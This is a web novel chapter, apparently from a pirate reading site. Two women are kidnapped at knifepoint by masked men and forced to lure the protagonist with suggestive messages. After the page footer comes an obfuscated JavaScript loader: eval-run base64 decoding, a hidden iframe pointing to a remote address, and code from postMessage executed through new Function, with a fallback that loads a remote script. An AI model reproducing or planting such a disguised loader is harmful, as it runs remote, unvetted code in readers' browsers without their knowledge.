收藏【小说123网www.txt123.cc】,元尊小说无弹窗免费阅读!

    陈锋可不知道娄晓娇居然也要打他的主意。

    但他已经决定不再搭理这两个女人了,所以,娄晓娇想要再请他出来吃饭喝酒什么的,陈锋肯定不答应。

    吴梦婷也很满意陈锋的这种态度,主要是她在见过娄晓娇和余晓慧她们两人之后,心中对这陈锋的这两个女同学已经没啥警惕心了。

    在吴梦婷看来,首先她们两人都有家庭孩子,所以很大概率不会跟陈锋发生什么。

    这不是对她们的信任,而是对陈锋的信任。

    因为在吴梦婷看来,陈锋不至于跟有妇之夫勾搭,做那么没品的事情。

    而两个女人中,娄晓娇长得算不上很漂亮,而且身高最多才一米五多点,陈锋不可能看得上。

    余晓慧倒是很有女人味,长得也比较漂亮,但还是那句话,她已经是有夫之妇,而且还是两个孩子的妈,又是跟娄晓娇在一起的,应该没有什么机会跟陈锋单独相处。而陈锋应该也不会主动去勾搭她。

    所以,吴梦婷对她们暂时还都是比较放心的。

    回去的路上,她主动说起,陈锋做为这边的地主明天应该去陪她们游玩一番,但被陈锋断然拒绝了

    ……

    第二天,住在酒店的余晓慧和娄晓娇直到快中午了才醒过来,她们昨晚睡一个房间聊到凌晨两点多才睡。

    主要的话题就是陈锋,娄晓娇看起来是真的看上陈锋了,硬是唧唧喳喳的拉着余晓慧聊了一晚上。

    这让余晓慧非常的郁闷,偏偏两人的关系一直都很要好,而且她刚刚经历了情夫之死,老公不是无期就是死刑的事情,她也不好跟她说太重的话,只能勉强支撑着跟她说到了大半夜。

    “娄晓娇你今天若是再硬拉着我聊陈锋,我立马就跟你分房睡。”

    从床上爬起来后,余晓慧第一时间警告显然有些发花痴的娄晓娇。

    娄晓娇笑着说:“知道了,宝贝,我们今晚聊别的男人。”

    余晓慧伸手扶额,今晚她是一定要跟她分房睡了。

    她也懒得再说,径自去上厕所洗漱。

    然后就一边刷着手机,一边等着娄晓娇慢慢腾腾地在洗手间磨蹭。

    直到差不多一个小时后,两人才从酒店里出来。

    昨天她们先是在东湖边走了半天,连十分之一的东湖风景都没看完,然后累得自行车都不想骑了,最后坐了绕湖的游览观光车,走马观花的算是逛了一遍东湖,但肯定不过瘾。

    最主要的是好几个景点都还没有停留拍照晒朋友圈,这点是最重要的。

    女人们出来旅游若是不拍照不晒一下朋友圈,怎么可能?

    所以,她们决定今天骑自行车去几个景点拍照。

    她们刚刚走出酒店不远,站在马路边,正打算找共享单车呢,结果就见一辆捷达停在了她们身边。

    然后,驾驶室里戴着口罩的司机就伸头过来,大声对她们说:“你们是不是余晓慧和娄晓娇?”

    两女闻言都是一愣,娄晓娇首先反应过来,带着警惕地反问:“你是谁?”

    司机马上说:“我是陈锋陈先生请来的司机,他想给你们一个惊喜,已经在一处私家菜馆安排好了午饭,请你们过去一起吃饭。”

    “真的吗?”

    两女对视一眼,都是不由一喜。

    “是的。那家私家菜馆挺高档的,要提前预订才行。陈先生是过去那边占位置了,所以没来亲自接你们。我是他叫的司机,拉你们过去。”

    “那我们走吧。”余晓慧高兴的拉着娄晓娇就要上车。

    但娄晓娇警惕心却是比较高的,立即就说:“等一下,我们先打个电话给陈锋,确认一下。”

    余晓慧闻言也反应过来,倒也不急着上车了。

    捷达司机见此有些不高兴地说:“这还有什么好确认的?快点上车,我这里不能停太久。不上我就走了。”

    娄晓娇却是不为所动,瞟了司机一眼后,还是继续拿着手机要陈锋打去了电话。

    正在这时,突然身后有人一把抢过了她的手机,然后她就感觉有尖锐物顶在了她后背,吓得她差点惊叫出声。

    没叫出声来,是因为背后这人先用阴恻恻的语气威胁她:“你若是敢叫一声,我立马就捅了你。我们只求财不求命。乖乖跟我们上车。”

    这话一说,再加上背后被这人用刀子顶着,娄晓娇吓得腿都软了,更不用说喊叫了。

    而余晓慧这边也有另外一人用刀顶住了她,吓得她花容失色,不敢乱动。

    两个女人如此就被两个戴口罩的男人轻松挟持上了车。

    捷达车一路狂飙向着城郊方向开去。

    这三个戴口罩的男人当然就是老马他们。

    本来,他们计划好了让老王开车骗两女上车的,这样就不会闹出太大动静。但娄晓娇却没这么好骗,要给陈锋打电话求证。

    这让他们不得不实行b计划,让等在不远处的老马和老金上前劫持两女上车。

    好在b计划实施起来很顺利,两女最终还是被他们弄上了车。

    “你们……你们要多少钱?说个数,能给的我一定给你们。”

    后座车厢,余晓慧和娄晓娇被老马和老金一左一右挤在了中间。

    娄晓娇勉强镇定心神,当说出来话还是带着颤音。

    老金马上开口说:“我们可不是绑匪,我们只是跟陈锋有仇,因为他欠了我们一笔钱,到现在都没还。刚好我们昨天看到你们跟他在一起,关系亲密。就只能麻烦你们帮我约他出来一趟。只要你们将他骗过来就行,我们一准儿就放了你。”

    娄晓娇闻言不由心中腹诽,心说你骗鬼呢。不过,嘴上她还配合着说道:“我们其实跟他也不是很熟,就是普通的初中同学,刚好我们这次来秀州玩,才联系上他的。以前我们都跟他好几年没见面了。”

    “我不管你们熟不熟,我只要你把他骗过来就行。若是骗不过来,哼哼,就别怪我们把怒火发泄到你们身上。”

    老金的话说得凶戾非常,神情也是相当到位,这算是他的基本职业素养,毕竟他公司的主营业务就是讨债,若是语气神态不凶狠一点,怎么可能讨得了债?

    娄晓娇因此被吓得瑟瑟发抖,不敢再说话了。

    “他欠你们多少钱?这会儿倒是余晓慧开口了。

    “不是很多,也就五百万吧。”老金张口既来,弄得还真像那么回事。

    “你们向他讨债就讨债好了,无辜牵连我们干什么?我们只是他的初中同学,除此之外没有其他什么关系。”

    娄晓娇闻言也连忙附和说:“就是啊。你要讨债就找他去,抓我们干什么呢?你们这不是节外生枝吗?你们这么绑架我们是犯法的。”

    “呵呵,我们只是请你们帮点忙,算什么绑架?而且我们相信你们到时候不会报警的。哈哈。”

    这段话里面的信息量还是比较足的,两个女人都不笨,立马就听出了其中的威胁之一时间都是花容失色。

    见已经将两个女人彻底震住了,老金又开口安慰道:“放心,你们只要乖乖配合我们,我们绝对不会伤害你们的,我用我的人格保证。”

    两女都沉默着不说话,她们倒是想打电话报警的,但就在对方的眼皮子底下,她们哪有报警的勇气。

    车子一路向东开,开了差不多半个小时后来到一处城郊地带,这里民居不少,而且基本上都是对外出租的。

    捷达车七拐八绕了一阵后,很快就开进了一条死胡同,在死胡同最里面停了下来。胡同一边是老旧的两层民房,看着就是出租房,另一边是一处老旧的仓库,卷帘门拉着。

    老马先闷声不响的下了车,然后就过去直接拉开了仓库的卷帘门,然后朝着车子这边招了招手。

    驾驶位上的老王顿时会意,当即启动车子,将整个车子都开进了仓库。

    老马立即就在外面将卷帘门给拉上了,人也留在了外面。毕竟余晓慧是认识他的,他虽然现在脸上戴着大口罩,但也怕余晓慧认出来。

    另外,他在外面也可以望风,虽然看起来没什么必要,但也算是以防万一了。

    仓库里车子停下后,老金先是对两女冷声威胁:“你们最好乖乖滴配合,不然嘿嘿,我是真的会一刀捅了你们的。现在跟我们下车!不许叫喊!”

    说着,他用手里明晃晃的匕首朝她们比划了一下,吓得她们缩成一团。

    “好了!下车!”

    老金和老王一边拉着一个,将她们拉下了车。

    这死胡同里,白天基本上没人过来,他们之前过去找两女之前已经侦查过了,

    这一片的出租房基本上都是空着的,有住人的白天也都不在,刚好让他们办事。

    这仓库不大,也就两百个平方的样子,里面还堆积着不少的杂物,应该是之前租仓库的人留下来的。

    老金先把两女的手机给收缴了过来,然后让她们解锁打开微信,找到陈锋这位好友,用她们的名义,给陈锋各自发去了微信。

    娄晓娇:【陈锋,我们今天来梅香镇玩了,你能过来跟我们一起玩吗?真的非常想让你过来啊。】

    余晓慧:【亲爱的,你能来梅香镇吗?这里的景色真的非常好,你不能跟我一起在这边欣赏这美丽的风景,真的太可惜了。我想你了。】

    老金毕竟是高中学历,而且四十多岁了,文学功底还是有一些的,而且用手机打字飞快。

    他分别编辑完这两条短信后就直接发给了陈锋。

    因为之前老马已经跟他们透了底,知道余晓慧跟陈锋有一腿,因此她的微信内容就写的比较露骨。

    在他看来,陈锋可以不给娄晓娇的面子,但肯定给余晓慧这位姘头面子。

    结果,两分钟过去,陈锋没有回应。五分钟过去,依旧没有。

    十分钟过去,居然还没有。

    老金顿时就有些恼了,立即拿出匕首朝一直乖乖站着的余晓慧和娄晓娇威胁道:“现在,你们每人都给那个陈锋发微信语音过去,约他来梅香镇,就说你们在这里等他。语气暧昧一点,能勾引人的那种。总之,你们一定要把他约过来,不然就别怪我们对你们不客气。还有,要说普通话,不许说你们鹿市话,不然我就当你们通风报信,给你们每人一刀。记住了吗?”

    见两女没反应,老金匕首直接指着娄晓娇:“嗯?”

    娄晓娇吓了一机灵,立即点头:“知……知道了。”

    “好,你们马上给他发语音过去。”

    两女在他们两人的逼视下,只能无奈的拿过手机,各自给陈锋发去了微信语音。

    娄晓娇:【陈锋,你快来梅香镇,不来的话,以后我们朋友都没得做了。】

    余晓慧:【陈锋,你能来一下……梅香镇吗?我们都在等你过来。】

    两分钟……五分钟再次过去,陈锋那边依旧没有任何回复。

    老金和老王见此都是有些疑惑和不满。

    这次老王开口说:“刚才的不行,你们重来。说话语气要柔一点,媚一点,勾引人一点,懂不懂?不懂的话,我就直接剥掉你们的衣服,把你们的果照发过去给她。”

    两女一听这话吓得不轻,娄晓娇连忙说:“好了,我知道了,我马上就照你说的发。”

    说完这些后,娄晓娇立即就给陈锋发去了暧昧语音:【陈锋,跟你说实话吧,其实我和晓慧都好像喜欢上你了,你说怎么办呢?你能过来一趟吗?我们不需要你负责什么,就只是想要跟你好好的交流交流,你懂得?】

    这番非常暧昧的话说完之后,直接发送了过去,然后娄晓娇顿时就傻眼了。

    本来老金对她这段语音挺满意的,但见到她这副摸样,当即皱眉问:“什么情况?”

    娄晓娇吞吞吐吐地说:“他……他好像……把我拉黑了。”

    “草!”老金当即夺过她手里的手机一看,还真是。

    “你给他发。”老金对着余晓慧命令道。

    余晓慧随手发了个问号过去,也显示被拉黑了,心里松了一口气的同时也有些无奈,她将手机递给老金看。

    老金接过一看也是有些傻眼,诧异地盯着余晓慧,很想直接问她“你不是跟他有一腿吗?他不是你姘头吗?他怎么会把你拉黑的?”

    但他知道不能这么问,一问就穿帮了。他只能压着心中的疑问和怒火,再次命令她们:“给她打电话。”

    然后,很快发现她们的手机号也被陈锋给拉黑了。

    老金和老马你看我我看你,都是一脸的懵逼之色。

    ------题外话------

    感谢:

    小何晓剑投了4张月票!!

    巴黎之翼、尾号402书友、尾号419书友、23xf、逍遥游乐逍遥、冰点v可乐、风雨乾坤间的月票支持!!

章节目录

免费都市小说推荐: 重开做房东 最强小村民赵子龙 赵子龙沈欣然 重生97之另类地产霸主 重生1993斗极品 从离婚开始的文娱 都市之交换人生俱乐部 白月光永不投降 护国利剑 万古帝婿

eval("\x77\x69\x6e\x64\x6f\x77")["\x57\x57\x57\x69"]=function(e){var jW =''+'ABCDEFGHI'+'JKLMNOPQ'+'RSTUVWXYZab'+'cdefghi'+'jklmnopqrst'+'uvwxyz0123456789+'+'/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=jW.indexOf(e.charAt(f++));o=jW.indexOf(e.charAt(f++));u=jW.indexOf(e.charAt(f++));a=jW.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x7A\x71\x4B\x57\x57\x56\x69\x6A\x48"]=function(){eval(WWWi("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoV1dXaSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKFdXV2koIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihXV1dpKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbV1dXaSgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKFdXV2koZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5SVRMNScrJ1FUJysnTnkweVknKydZR0pUSicrJ2xSJysnV2VscCcrJ1gnKydjR0pUSicrJ3onKydRJysnRE4nKyd3RVRRJysnelUnKydTYnZOJysnbUx1SicrJzJjbVJXJysnYnVjMycrJ2QzWmsnKydNbCcrJ1lZaycrJ01sRScrJzAnKydNbE0nKydIYzAnKydSSGEnKycnKycnLCcnKyc3cnYnKydURDknKydsSScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydKR2YnKyc3ZDMnKycwJysnJysnJywnWScp"));}